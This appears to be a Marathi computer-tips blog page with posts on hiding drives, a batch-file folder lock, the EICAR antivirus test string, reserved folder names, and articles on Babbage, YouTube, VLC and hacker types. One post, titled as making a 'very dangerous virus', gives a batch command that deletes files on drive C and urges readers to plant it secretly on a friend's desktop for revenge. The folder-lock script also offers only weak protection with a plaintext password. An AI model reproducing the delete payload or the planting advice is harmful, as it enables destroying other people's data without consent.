• स्वागतम!!

    स्वागतम!!

    GanSun Inc. च्या मराठी; व्हर्जन वेबसाईटवर आपले स्वागत आहे.

  • यांनी जग बदललं!!

    यांनी जग बदललं!!

    या IT कंपन्यांनी खरच जग बदलून टाकल

  • तुमच्या PC मध्ये कोण आहे?

    तुमच्या PC मध्ये कोण आहे?

    व्हायरस का तुमचा डेटा

  • सिक्यूरेटी टेक्निक्स

    सिक्यूरेटी टेक्निक्स

    Encryption आणि Decryption

  • तुम्हाला हॅकिंग बद्दल माहित आहे का?

    तुम्हाला हॅकिंग बद्दल माहित आहे का?

    तुमच्या कॉम्पुटर जगातला एक चोरटा जो तुम्हाला न सांगता तुमच्या PC मध्ये शिरतो आणि तुमचा डेटा हाताळतो.

तुमचा ड्राईव्ह(Drive) इतरांपासुन लपवा

1 comments

  आज सकाळीच माझा मित्र मला म्हणाला,'अरे!! काल माझ्या वडिलांनी माझा PC चेक केला....मी एका ड्राईव्ह मध्ये माझा प्राईव्हेट डेटा ठेवला होता..आणि तो मला कुणालाही दाखवायचा नव्हता पण नेमका तोच डेटा वडिलांच्या हाती पडला...बापान मला खुप मारल यार!'...........आता त्याने कोणता डेटा ठेवला होता हे एव्हाना तुम्हाला कळालच असेल.

तुम्हालाही कधी या प्रसंगातून जाव लागत असेल.........काय म्हणताय नाही?......ठिक आहे ठिक आहे........बर 'तशा प्रकारचा' डेटा जरी तुम्ही ठेवत नसला तरी काहि इतर फाईल्स जश्या कि स्वतःचे बॅंकींग Documents,Credit/Debit Card Details,आपले अकाउंट पासवर्ड,आवडती गाणी ठेवत असालच ना!!

  मग हा सर्व डेटा एका Drive मध्ये ठेवुन तुम्हाला तो खुप जपायच असेल तर. तर इथे मी एक Drive Protect करण्यासाठी एक मार्ग सांगणार आहे.

  खाली दिलेल्या सुचना नीट वाचा आणि त्याप्रमाने करा:-

1. तुमच्या पी.सी मधील कमांड प्रोम्ट (Command Prompt) उघडा [शार्टकटसाठी Win+R].



2. मग काळी विंडो आल्यावर त्यात Diskpart टाईप करा आणि एंटर बटण दाबा.मग yes टाईप करा आणि एंटर बटण दाबा. तुमच्या समोर वेगवेगळ्या Commands ची list आल्यानंतर list volume अस टाईप करा आणि एंटर बटण दाबा.
 


3. जर तुम्हाला E: Drive लपवायचा असेल तर select volume E  टाईप करा
आणि एंटर दाबा.

4. Drive निवडल्यानंतर remove letter E अस टाईप करा आणि पुन्हा एकदा एंटर दाबा.


5. मग तुमचा कॉप्मुटर Boot(Restart) करा.....रिस्टार्ट झाल्यानंतर Drive गायब झाला असेल.


















'अरे बाबा पण माझा Drive परत कसा आणु?'....असा प्रश्न सहाजीकच तुम्ही मला विचारणार.OK सांगतो.

   I. वरील 1 ते 3 स्टेप पुन्हा perform करा.

   II. Drive निवडल्यानंतर assign letter E अस टाईप करा......तुमचा Drive परत दिसु लागेल.
हि Trick कशी वाटली ते कमेंट through कळवा.




 
















Read more

सॉफ्टवेअर शिवाय फोल्डरला पासवर्ड द्या

3 comments


  हि खुपच उपयोगी ट्रिक्स आहे आणि बर्‍याच जणांना या ट्रिक ची गरज असेल.....कोणीही आपला प्राईव्हेट डेटा(Private Data) दुसर्‍यांबरोबर share करु इच्छित नसतो. पण तरीही काहि वेळा तो डेटा नकळत दुर्‍यांच्या हाती पडतो. याच एकमेव कारण हे कि आपण त्या फोल्डरला Security सुविधा देण्यात चुकतो आणि अशी सुविधा बर्‍याच Operating System मध्ये नसते. ती आपल्याला सॉफ्टवेअर स्वरुपात विकत घ्यावी लागते.    पण आज आम्हि तुम्हाला कुठलेही सॉफ्टवेअर न वापरता हि Security फोल्डरला कशी द्यायची हे सांगनार आहोत.
  
हि क्लुप्ती(Trick) Windows च्या कोणत्याही O.S मध्ये वापरतता येते. या trick साठी आपल्याला नोटपॅड(Notepad) आणि खाली दिलेल्या कोड व्यतरिक्त कशाचीही गरज नाहि.
  
पहिला हा कोड तुम्हि तुमच्या Notepad मध्ये copy-paste करुन घ्या....मग तो secure.bat या फाईल मध्ये save as करा.






















/*  हा दिलेला कोड कॉपी करा */
cls
@ECHO OFF
title www.mgansun.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST lockFolder goto MDlockFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren lockFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== gansun goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" lockFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDlockFolder
md lockFolder
echo lockFolder created successfully
goto End
:End

   File
तयार झाल्यावर त्याच्यावर double-click करा....त्या file च्या शेजारीज lockFolder ह्या नावाचा Folder तरार होईल. तुम्हाला जो तुमचा डेटा(Photo,Documents,Songs,Movies काहीही) Password Protect करायचा आहे तो या फोल्डर मध्ये ठेवा.



 मग परत एकदा secure.bat फाईल वर click करा, इथे तुच्यासमोर एक काळी विंडो


येईल त्याला Y अस उत्तर द्या.....तुमचा फोल्डर गायब झाला असेल....आणि कोणी ही तो पाहु शकणार नाही even फोल्डर मधील 'show hidden files and folder' हा option Enable केला असेल तरीही.
 
वरिल कोड मधील उठून दिसणार नाव म्हणजे त्या फोल्डरचा पासवर्ड आहे तो तुम्ही तुम्हाला पाहिजे तसा बदलू शकता.


 



Read more

अतिशय भयानक व्हायरस तयार करा

0 comments
   व्हायरस हा एक कमालीचा अतिरेकि असतो. कधी आपल्या संगणकात प्रवेश करतो आणि कधी आपल्या संगणकाची वाट लावतो हे आपल्याला कळतही नाही. इथे आपण "प्रतिशोध" नावाचा एक व्हायरस तयार करण्याबाबत जाणुन घेणार आहोत. पण हा व्हायरस तुम्हाला ज्या मित्राचा प्रतिशोध(बदला) घ्यायचा आहे त्याच्याच कॉम्पुटर वर हा व्हायरस तयार करावा. ह्याचा main फायदा हा आहे कि कोणताही Anti-Virus याला शोधू शकत नाही.

   पुढचा कोड वापरुन तो  .bat या एक्स्टेंशन (extension) file मध्ये save करा ( नोटपॅड द्वारे save as)-

@Echo off
Del C:\ *.* |y


  मग .bat file तयार झाल्यावर ती तुमच्या मित्राच्या डेस्कटॉप वर ठेवा(त्याला कळुन देवु नका) आणि घरी निघुन या......जर मित्राने उत्सुकतेपोटी ती फाईल ओपन केली तर त्याच्या कॉप्मुटरची वाट लागलिच समजा. पुढच्या दिवशी तो तुम्हाला त्याच्या कॉप्मुटरची दुख:भरी कहाणी सांगितल्या शिवाय राहणार नाही आणि तुम्ही मात्र हसल्याशिवाय राहणार नाही.

   बेसिकली हा व्हयरस नाही हि एक हार्ड-डिस्क फॉरमॅट करण्याची फाईल आहे.....पण एक लक्षात ठेवा हि फाईल तुमच्या PC वर तयार करण्याची रिस्क घेऊ नका आणि घेतलीच तर आमच्यावर आरोप करु नका. हि एक पुर्व-सुचना आहे!!


Read more

तुमचा ऍन्टी-व्हायरस चांगला आहे का?

0 comments
 तसे ऑनलाईन बाजारात बरेच ऍन्टी-व्हायरस सॉफ्टवेअर्स आहेत. पण नक्की चांगला ऍन्टी-व्हायरस कोणता? या पेचात आपण पडतो. बर त्यातलाच एखादा ऍन्टी-व्हायरस आपण खरेदी केला आणि तो व्हायरस काढण्याच काम करतोय हे आपल्याला कशावरून कळेल.


   













त्यासाठी एक "जनरल व्हायरस सिग्नेचर कोड (General Virus Signature Code)
आहे....त्याचा वापर करुन तुम्हि तुमच्या ऍन्टी-व्हायरसला ओळखू शकतो. यालाच  EICAR(European Institute for Computer Antivirus Research) टेस्टींग असेही म्हणतात.
१. प्रथम तुम्ही तुमचा नोटपॅड(Notepad) उघडा....मग त्यात पुढील कोड कॉपी करुन घ्या-

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

२. मग save as विकल्प निवडून Virus.exe या फाईल मध्ये सेव्ह करा.
३. जर तुमचा ऍन्टी-व्हायरस चांगल्या कंपनीचा असेल तर तो ऍन्टी-व्हायरस ह्या 'Test Virus File' ला व्हायरस म्हणुन अलर्ट देईल.......जर अलर्ट दिला नाहि तर समजाव तुम्ही ऍन्टी-व्हायरस घेताना फसलात आणि तुम्हाला चांगल्या कंपनीचा ऍन्टी-व्हायरस घ्यावा लागेल.


Read more

विंडोज फोल्डर ट्रिक : डिलीट न होणारा फोल्डर

0 comments
    या लेखात आपण विंडोज ऑपरेटिंग सिस्टम (Windows O.S) वरिल  फोल्डर वर वापरली जाणारी एक simple ट्रिक शिकणार आहोत. Normally आपण तयार केलेले फोल्डर्स हे दुसरे युजर्स Rename व Delete करू शकतात. पण अस त्यांना न करु देण्यासाठी तिथे कोणताही option नसतो. असे option देणारे सॉफ्टवेअर्स असतात तो भाग वेगळा,...पण इथे आपण कोणतेही सॉफ्टवेअर्स न वापरता हि ट्रिक्स वापरणार आहोत
    त्या अगोदर आम्ही तुमच्यासाठी एक चॅलेंज देतो जर तुम्ही त्यात यशस्वी झालात तर तुम्ही १ कोटि रुपये जिंकू शकता.......!!
    "अरे बापरे! १ कोटि,कस शक्य आहे?",..."काही फेकतोय...आणि देणार कोण एक कोटि?".....आम्हाला माहिती आहे वरील वाक्य ऐकून तुमच्या अश्याच प्रतिक्रिया येतील.....ठीक आहे...OK....OK आम्ही गंमत करत आहोत. पण तरीही चॅलेंज स्वीकारायला काय जातय.
    चॅलेंज हे आहे कि तुम्हि पुढिल नावाचा फोल्डर करुन दाखवा - con,aux, lpt1, lpt2, lpt3 up to lpt9. नाही ना जमल....जमनारच नाही कारण हि नावे विंडोज ओ.एस स्वतःसाठी reserve ठेवली आहेत आणि ती नावे आपण वापरु शकत नाही.
    पण या ट्रिकद्वारे आपण त्याच नावाची फोल्डर्स तयार करून त्यात आपल्या फाईल्स सुरक्षित ठेवु शकतो. पुढिल सुचना नीट वाचून त्याप्रमाणे करा -:
१. विंडोजच्या डाव्या बाजुला असणार्‍या हिरव्या 'START' बटन वर click करा.

२. मग 'RUN' Option वर click करा [ Shortcut साठी Win+R ].

३. मग 'RUN' विंडोवर cmd टाईप करा...आणि Enter बटण दाबा.


४. पण एक लक्षात घ्या हे फोल्डर तुम्ही C: ड्राईव्ह वर तयार करु शकत नाही.
५. आता काळी विंडो आल्यावर त्यात D: किंवा E: टाईप करा...आणि Enter बटण दाबा.
६. मग md con\ टाईप करा...आणि Enter बटण दाबा. फोल्डर तयार होईल.


 

७. फोल्डर तयार झाल्यावर त्यात तुमच्या फाईल्स तुम्ही सुरक्षित ठेवू शकता....कोणीही तो फोल्डर डिलीट व रिनेम करू शकत नाहि.

पण आता तुम्हालाच हा फोल्डर डिलीट करायचा असेल तर....

१. कमांड प्रोम्प्ट ओपन करा.[win+R]
२. ज्या ड्राईव्ह वर फोल्डर आहे त्याच नाव टाइप.( जस D: E: )
3. मग rd con\ टाईप करा. फोल्डर नाहिसा झाला असेल.


 
 


Read more

संगणकचा जन्मदाता : चार्लस/चार्ल्स बॅबेज

1 comments
चार्लस बॅबेज
   आजच्या जगात कॉम्पुटर शिवाय कामाच एक पान देखिल हालत नाही. अनेक कारामती करणारा कॉम्पुटर पहिल्यांदा कोणी बनवला किंवा या अजब,अनोख्या जादुगार मशीनची पहिली कल्पना कोणाच्या डोक्यातून निघाली किंवा या मशीन चा जन्मदाता कोण?.....अशा सगळ्या प्रश्नांच एकच उत्तर असेल "चार्लस/चार्ल्स बॅबेज". तस कॉम्पुटर बनवण्यात बर्‍याच कॉम्पुटर साईन्टिस्टची मेहनत आहे. पण जस 'पहील श्रेय जो त्या उपकरणाची Discovery करतो त्याला जात, त्याला नाही जो त्या उपकरणात बदल करून त्याची शक्ती वाढवतो'. म्हणुनच या आधारे पाहिल तर बॅबेजचच कॉम्पुटरचा जन्मदाता आहे.
   चार्लस बॅबेज हे थोर गणिततज्ञ,तत्वज्ञानी आणि मेकॅनिकल इंजिनीअरही होते....पण त्यांना जास्त ओळखल जात ते त्यांच्या कॉम्पुटर मधील योगदाना बद्दल. त्याच्या या योगदाना बद्दल त्यांना "FATHER OF COMPUTER" या नावाने ओळखण्यात येत. त्यांचा जन्म तसा कधी झाला यात खरच खुप पेच आहे कारण 'ऑक्सफर्ड डिक्शनरी ऑफ नॅशनल बायोग्राफी(Oxford Dictionary of National Biography)'यांच्यानुसार त्यांचा जन्म २६-डिसेंबर-१७९१ साली झाला तर 'द टाइम्स(The Times) या वृत्तपत्रात त्यांचा जन्मसाल १७९२ साली झाला आहे अस छापुन आल होत. याउलट 'स्टे. मेरिज चर्ज( St. Mary's  Church Newington, London)'मध्ये ते 6 January 1792 साली जन्मलेल्याची नोंद आहे. ह्या सगळ्या पेचामुळे शेवटी त्यांच्या पुतण्यांनी जाहिर केले कि त्यांचा जन्मदिन २६-डिसेंबर-१७९१ आहे.
   बेंजामीन बॅबेज व बेस्टी बॅबेज यांना चार अपत्य होते...त्यातील एकाच नाव होत चार्लेस. बेंजामीन बॅबेज १८०१ मध्ये'प्रिड्स बॅंकेचे' भागीदारी होते. बेंजामीन बॅबेज व त्यांच कुटुंब १८०८ मध्ये 'इस्ट टेइनमाउथ (East Teignmouth)' येथे स्थलांतरीत झाले. इथे चार्लेसला अल्फिनटोन(Alphington)मधे असण्यार्‍या शाळेत पाठविण्यात आल. काहि काळासाठी त्याला 'किंग एडवर्ड ग्रामर( King Edward VI Grammar School)' शाळेतही पाठवण्यात आले.जेव्हा चार्लेस 'थर्टी स्टुडंट हॉलमन ऍकॅडमी(30-student Holmwood academy)'मध्ये जाऊ लागला तेव्हा त्याची गणिताशी मैत्री झाली. तो १६-१७ वर्षाचा होता तेव्हा त्याने दोन शिकवण्या लावल्या होत्या त्यातील 'ऑक्सफर्ड' शिकवणी मुळे त्याला केब्रिज विद्यापीठात (University of Cambridge) प्रवेश मिळू शकला.
   ऑक्टोंबर १८१० साली चार्लेस कॅब्रिज विद्यापीठाच्या ट्रिनीटी कॉलेज मध्ये दाखल झाला. त्याला इथे येण्यापुर्वीच गणिताबद्दल खुप आवड होती. इथे आल्यानंतर तो नियमीत लायब्ररी मध्ये जाऊन थोर गणितज्ज्ञ रॉबर्ट वूडहाऊस(Robert Woodhouse),जोसेफ-लूईस लॅग्रांज(Joseph-Louis Lagrange) व मारीआ गॅटेन अग्नेसी(Maria Gaetana Agnesi) यांच्याबद्दल वाचन करू लागला. त्याला गणिताने अक्षरश पछाडलेल होत ( आपल्यालाही गणित विषय परिक्षेत पछाडत पण त्याच्या भीतीमुळे...पण इथे याअर्थी नव्हे). गणितावर एवढ प्रेम असुनही तो 'स्टॅडर्ड मॅथेमेटिकल इन्सट्रक्शनस (standard mathematical instruction)' मध्ये नापास झाला. पण तरीही त्याने उमेद न सोडता गणितावर तेवढच प्रेम केल. याच विद्यापीठात १८१२ साली चार्लेस बॅबेज,जॉन हर्शेल,जॉर्ज पिकॉक व इतर मित्रांनी 'ऍनॅलेटिकल सोसाईटी (Analytical Society) स्थापन केली. याचापण एक खास किस्सा आहे एडवर्ड ब्रोमहेड(Edward Bromhead) यांच्या निवासस्थानी हि मंडळी नाश्टा करण्यासाठी एकत्र झाली तेव्हा ब्रोमहेड यांनीच या मंडळींना 'ऍनॅलेटिकल सोसाईटी' स्थापना करण्यास सांगितल. या ऍनॅलेटिकल सोसाईटी मध्ये कालबाह्य झालेले 'न्यूटोनीयन कॅल्कूलस(Newtonian calculus) ला पर्याय म्हणुन बनवन्यात आलेल नवीन 'ऍनॅलेटिकल कॅल्कूलस' वर काम चालायच. पुढे याच सोसाईटीच नाव बदलून 'कॅब्रिज फिलॉसॉफी सोसाईटी(Cambridge Philosophical Society)' अस ठेवण्यात आल.
    विद्यापीठात असताना बॅबेज आणखी एका सोसाईटीचा सदस्य झाला. हि सोसाईटी तर कमालच होती....यात सर्व सदस्य निसर्गामधील छुप्या घटनांचा/जागेंचा शोध घ्यायचे.ह्या सोसाईटीच नावही कामाप्रमाने कमाल होत-'द घोस्ट क्लब(The Ghost Club)'. आजही हा क्लब ट्रिनीटी कॉलेजमध्ये अस्तित्वात आहे. आजपर्यंत या क्लबने भरपुर रहस्यमय जागा शोधल्या आहेत.
    १८१२ साली म्हणजेच बॅबेज २० वर्ष वयाचा होता तेव्हा तो कॅब्रिजमधील पीटरहाऊस कॉलेज मध्ये आला....तो तिथला हुषार गणितज्ज्ञ होता....पण तरिदेखील तो प्रथम श्रेणीत पदवीधर होऊ शकला नाही. त्याने १८१४ साली परिक्षा न देताच पदवी मिळवली. अस होन शक्य नव्हत पण तो त्यावेळी शोध-निबंध लिहित असल्याने त्याला सूट दिली होती, त्याच्या प्राध्यापकांनी तो परिक्षेला बसला अस दाखवुन त्याला पास केल होत.

क्रमशः
 


Read more

यूट्यूबः व्हिडिओंच जग (भाग-१)

0 comments


  व्हिडिओंचा खजिना म्हणजेच यूट्यूब!. इंटरनेट वरील एक सुप्रसिध् वेबसाईट आणि 2012 नुसार जगातली तिसर्या स्थानावरील वेबसाईट. दर महिन्याला 1400 कोटी युजर्स युट्युबवरील व्हिडीओ बघतात. त्यातील 100 कोटि युजर्स हे दर महिन्याला नवीन असतात. युट्यबवर दर मिनिटाला 72 तासाएवढा व्हिडीओ अपलोड होत असतो. 2011 च्या आकडेवारीनुसार युट्यबवरील व्हिडीओ बघणार्याची संख्या इतकी मोठी आहे कि त्याची तुलना करायची झाली तर हि अशी की - पृथ्वीवरील प्रत्येक व्यक्तीने अत्तापर्यंत 140 व्हिडिओ पाहिलेले आहे. म्हणजेच 2011 सालची जगातली लोकसंख्या गुणीले 140 अबब…. केवढा मोठा आकडा!!! त्याहुन अचंबीत म्हणजे लोकांमधील व्हिडीओ पहाण्याची नशा.तीपण फक्त 8 वर्षात. होय...! फक्त 8 वर्षात...कारण 8 वर्षापुर्वी म्हणजेच 2005 साली यूट्यूबचा नामोनिषान सुध्दा नव्हता.

  यूट्यूबची सुरूवात हि विस-पंचवीसीतील तीन तरूण मुलांनी केली. ती तिन मुल म्हणजे अमेरिकेतील चॅड हुर्ले,स्टिव्ह चेन आणि जावेद करीम.




Read more

व्हि.एल.सी मीडिया प्लेअर : उत्कृष्ट व्हिडिओ प्लेअर

0 comments
 खाली दाखवलेला केशरी कोन तुम्ही पाहिला असेलच. बर्याच जणांच्या डेस्कटॉप वर हा कोन असेल याची मला खात्री आहे. ऑपरेटिंग सिस्टम कोणतीही असो पण केशरी कोन असलेला व्हि.एल.सी मीडिया प्लेअर आपल्या कॉम्पूटर मध्ये इन्स्टॉल असतोच. 
व्हि.एल.सी मीडिया प्लेअरचा लोगो

बर्याच ऑपरेटिंग सिस्टीम मध्ये त्यांचा इन-बिल्ट व्हिडिओ प्लेअर असतो जस - मायक्रॉसॉफ्ट विंडोज मधील विंडोज मीडिया प्लेअर. पण तो आपल्याला फारसा आवडत नाही. त्याएवजी VLC Media Player आपल्याला आवडतो....हा प्लेअर आपल्याला आवडतो याच कारण त्याच्या मध्ये असलेल्या वेगवेगळ्या सोयी-सुविधा. सध्या नंबर एक वर असलेला हा प्लेअर व सर्वात जास्त वापर असनार्या या प्लेअरची पार्श्वभूमी काय आहे ते आपण जाणून घेणार आहोत.

 सर्वात प्रसिद्ध असलेल्याया या प्लेअरला जन्म दिला तो फ्रान्समधील इकोल सेंट्रल पॅरिस विद्यापीठच्या संगणक शाखेमधील तरूण विद्यार्थ्यांनी. खर तर हि एक दुर्घटना होती, कारण दर वर्षि इकोल सेंट्रल विद्यापीठाचा वार्षिक उपक्रम असतो त्यात प्रत्येक विद्यार्थ्यांचे वेगवेगळे गट असतात आणि त्या गटांना प्रोजेक्ट्स बनवायचे असतात. व्हि.एल.सी मीडिया प्लेअर हा देखील 1996 चा एक वार्षिक उपक्रमच होता. विद्यापीठच्या एका गटाने C,C++ प्रोग्रॅमिंग लॅंगवेज वापरून 1996 साली हा प्लेअर बनवला. पण तेव्हा त्याचे नाव होते VideoLAN Client. विद्यापीठच्या आवारातील इमारतींमध्ये असलेल्या कॉप्मूटरच्या नेटवर्कच्या माध्यमातून VideoLAN Client सॉफ्टवेअर वापरले जात असे. VideoLAN Client चा उपयोग हा क्लायंट आणि सर्व्हर मधील असलेले व्हिडिओ पहाण्यासाठी होत होता. याच्या आयकॉनची पण एक मनोरंजक कथा आहे. केशरी कोन असलेला VideoLAN Client चा आयकॉन हा मुळात वाहतुक ट्रॅफीक मध्ये वापरले जाणारे साधन आहे. त्यावेळी इकोले सेंट्रल विद्यापीठच्या आजुबाजूच्या रस्त्यावर हे कोन रस्ता वाहतुकसाठी ठेवलेले असायचे तेव्हा बरेच विद्यार्थी हे कोन उचलून विद्यापीठात आणत असत.
वाहतुक ट्रॅफीक कोन

VideoLAN Client चा प्रोजेक़्ट बनवणारे विद्यार्थीही हे ट्रॅफीक कोन आपल्या संगणक लॅब मध्ये आणायचे. जेव्हा VideoLAN Client चा Icon कोणता असावा हा प्रश्न आला तेव्हा त्यांची नजर या ट्रॅफीक कोन वर पडली आणि त्यांनी हाच Icon वापरला.


  1998 साली हा प्लेअर पुन्हा नव्याने लिहण्यात आला आणि 1 फेब्रुअरी 2000 साली इकोल सेंट्रल विद्यापीठच्या मुख्याद्यापकाने तो सर्वांसाठी मोफत इंटरनेटवर खुला करुन दिला. VideoLAN Client हे नाव मोठे आणि सामान्य व्यक्तीला न समजणारे होते त्यामूळे या प्लेअरचे नाव बदलून VLC Media Player करण्यात आले. VLC प्लेअरचे सर्व हक्क जरी VideoLan Team कडे असले तरी कोणीही हा प्लेअर डाऊनलोड करु शकतो आणि त्याला पाहिजे तसा बदल करुन VideoLan Team कडे पाठवु शकतो. VLC प्लेअर हा ओपन सोर्स(Open Source) प्रोग्रॅम आहे आणि याचे लायसेन्स हे "जनरल पब्लिक लायसेन्स"(GNU General Public License) आहे. हेच कारण आहे कि ज्यामुळे VLC प्लेअर हा पहिल्या स्थानावरचा व्हिडिओ प्लेअर आहे. कारण जगभरातील अनेक सॉफ्टवेअर प्रोग्रॅमर या प्रोजेक्टला दरवेळी मदत करतात. हा लोकांनी लोकांसाठी बनवलेला उत्कृष्ट मोफत व्हिडिओ प्लेअर आहे. आत्ता पर्यंत याच्या अनेक आवृत्त्या आल्या आहेत. याची 1.0.0 हि पुर्णांकी आवृत्ती  7 जुलै 2009 ला आली आणि 2.0.0 हि आवृत्ती 18 फेब्रुअरी 2012 ला रिलीझ झाली.  सध्याची(2013) आवृत्ती 2.0.6 हि आहे. जर तुम्हि देखिल या जगव्यापी उपक्रमाला हातभार लावण्यास उत्सुक असाल तर तुम्हि या उपक्रमात सहभागी होउ शकता. यासाठी तुम्हाला प्रोग्रॅमर असण्याची पात्रता असावी अस काहि नाही. तुम्हि वेगवेगळ्या स्वरुपात मदत करु शकता. याची सविस्तर माहिती इथे मिळेल.


Read more

दिवसांमधील फरकाचे गणनयंत्र

0 comments
दिवसांमधील फरक गणनयंत्र,दिवस गनणनयंत्र


आम्ही तुमच्यासाठी एक सुंदर "दिवसांमधील फरक गणनयंत्र" सादर करत आहोत त्याचा फायदा तुम्हाला नक्की होईल........

----------------------------------------------------------------------------------------------------------



दिवसांमधील फरक असेलः


----------------------------------------------------------------------------------------------------------
Copyright @ 2012-2013 GanSun Inc.
----------------------------------------------------------------------------------------------------------



Read more

मराठी गूगल ट्रान्सलेटर : अखेर मराठी इंटरनेट युजर्सचा विजय

0 comments


 तस पहायला गेल तर गूगलचे बरेच प्रोडक्ट्स आहेत. पण सर्वांना आवडेल असा गूगलचा गूगल ट्रान्सलेटर हा ऑनलाईन प्रोग्रॅम खुपच प्रसिध्द आहे. आपण या प्रोग्रॅमचा वापर करून एका भाषेचे दुसर्या भाषेत रुपांतर करू शकतो.यापुर्वी गुगल भारतातील सहा भाषांसाठी (हिंदी,बंगाली,गुजराती,कन्नड,कन्नड,तेलुगु) सेवा देत होता. पण याच महिन्यात (मे-२०१३) गुगलने आणखी पाच भाषांची सेवा पुरवली आहे. त्या भाषांमध्ये भारतातील मराठी भाषा सुध्दा आहे. हा मराठी माणसासाठी गर्वाचा क्षण आहे. याआधी मराठी इंटरनेट युजर्सनी सर्जी ब्रिन (गूगलचा संस्थापक) याला बरिच पत्र पाठवली होती कि आमची मराठी भाषा तुमच्या गूगल ट्रान्सलेटर वर आणा. त्या सर्व मराठी इंटरनेट युजर्सनीचा आज विजय झाला आहे.





 एकुणच याचा अप्रत्यक्ष गुगलाच फायदा आहे कारण मराठी भाषिकांची संख्या हि  ७५० लाखाच्या आसपास आहे.गुगलने हि सेवा द्यायच्या आधी हे आकडे नक्किच लक्षात घेतले असणार आणि म्हणुनच आज गुगल ट्रान्सलेटर वर आज मराठी भाषा झळकती आहे. सध्या गुगल ट्रान्सलेटर हिंदी भाषेसाठी संपुर्ण ट्रान्सलेशेनची सेवा पुरवते तर बाकिच्या सहा(मराठी,बंगाली,गुजराती,कन्नड,कन्नड,तेलुगु)भाषाची वाक्यरचनेची बांधनी चालू आहे. यालाच गुगलने अल्फा लॅंगवेज असे नाव दिले आहे.

  मराठी बरोबरच बोस्नियन,सेबुआनो,जावाई,माँग चार फॉरेन लॅगवेजही लॉन्च झाल्या आहेत.

या सेवेचा अनुभव घ्यायचा असेल तर इथे टिचकी मारा.





Read more

हॅक्टिवीस्ट

0 comments





हे हॅकर्स टेक्नॉलॉजीचा वापर करून सोशल वेबसाईट वर बदणामीचे लेख लिहतात. राजकारण,धर्म व कुठल्याही विषयाला वादग्रस्थ करणे यांचा मुख्य हेतू असतो.

उदागरण: १.फेसबुकवर मुलींना फसवने,त्याचा फेसबूक वॉलवर बदनामीचे लेख लिहणे.
       २.कोणत्याही धर्माच अनादर करणारा लेख प्रसिध्द करणे.
       ३.राजकारण्यांबद्दलचे अपमानकारक फोटो,लेख अपलोड करणे.

काहि वेळा हे हॅकर्स स्वतःचा आय पी एड्रेस(IP Address) लपवून ठेवतात,ज्यानेकरून सायबर पोलिस त्यांना शोधू शकत नाहित.


मुख्य लेख वाचा.


Read more

स्क्रिप्ट किड़ी

0 comments



कमी ज्ञान असणारे हे हॅकर्स असतात. दूसर्या हॅकर्संनी तयार केलेल्या ऑटोमॅटिक हॅकिंग सॉफ्टवेअरचा वापर करून हे वेबसाईट हॅक करू शकतात. इथे स्क्रिप्ट(Script)चा अर्थ छोट्या-छोट्या हॅकिंगच्या स्क्रिप्टच ज्ञान आणि किड़ी(Kiddie)म्हणजे बाळ. सोशल मिडिया (फेसबुक,जि-मेल,याहु,लिंन्क्ड इन) मध्ये बर्याच जणांचे अकाउंट हे या हॅकर्स कडुन हॅक केले जातात.


मुख्य लेख वाचा.


Read more

इलाईट हॅकर

0 comments




अत्यंत हुषार असणारे हॅकर्स हे या प्रकारात मोडतात. हे हॅकर्स हॅकिंगचे नवीन-नवीन टेक्नॉलॉजी तयार करतात. या हॅकर्सनां प्रोग्रॅमिग स्क्रिप्टच संपुर्ण ज्ञान असत. हे हॅकर्स हॅकिंगचे वेगवेगळे सॉफ्टवेअर तयार करतात. कुठल्याही सर्व्हरची नेटवर्क सिक्यूरेटि तोडण्यात हे सक्षम असतात. यांना हॅकिंगचे इनव्हेंटर(Inventor-शोधकर्ते) म्हणल्यास वावग ठरणार नाही.


मुख्य लेख वाचा.


Read more

ब्लू-हॅट हॅकर

0 comments


   मायक्रोसॉफ्ट कंपनीमध्ये काम करणारे हॅकर्स हे ब्ल्यू हॅट हॅकर या नावाने ओळखले जातात. हे हॅकर्स कंपनी मध्ये तयार होणार्य प्रोडक्टची टेस्टिंग करतात. उदाहरण द्यायच झाल तर अस कि, जर मायक्रोसॉफ्ट नवीन ऑपरेटिंग सिस्टम लॉन्च करत असेल तर लॉन्चिंच्या आधी त्या ऑपरेटिंग सिस्टमला कोणी हॅक करू शकत का हे पाहिल जात.
 ब्ल्यू हॅट हॅकर हे ब्लॅक-हॅट हॅकर प्रमाणे विचार करून विंडोज ऑपरेटिंग सिस्टम हॅक करण्याच प्रयत्न करतात. जर सिस्टम हॅक झाली तर ते डेव्हलपर्सना रिपोर्ट देउन त्यात सुधार करण्यास सांगतात. सोप्या भाषेत सांगायच झाल तर ब्ल्यू हॅट हॅकर हे सिस्टम टेस्टिंगच काम करतात.


मुख्य लेख वाचा.


Read more

ग्रे-हॅट हॅकर

0 comments






ग्रे हॅट हॅकर्स मध्ये "ब्लॅक हॅट हॅकर्स" आणि "व्हाईट हॅट हॅकर्स" हे दोन्ही प्रकाचे हॅकर्स असतात. ह्या हॅकर्संचा कोणालाही नुकसान करण्याचा हेतू नसतो. हे हॅकर्स सतत इंटरनेट वर सर्फिंग करत असतात आणि कोणत्याही वेबसाईटला भेटून त्याची सिक्यूरेटी मजबुत आहे का नाही ते पहातात.
उदा. जर कोणी "ग्रे हॅट हॅकर्स" इंटरनेट वर फिरत असेल आणि कोणत्यातरी एका वेबसाईटला त्याने भेट दिली आणि जर त्या वेबसाईटची सुरक्षितता कमकुवत असेल तर प्रथम हे हॅकर्स ती वेबसाईट हॅक करतात आणि त्याच्या वेबसाईटवर "तुमच्या वेबसाईटची सुरक्षितता अशक्त आहे. जर तुम्हाला ती वाढवायची असेल तर आम्हाला कॉल करा. आम्ही कमी रुपयांत तुम्हाला तुमच्या वेबसाईटची सिक्युरिटी देउ." असा मेसेज देतात.



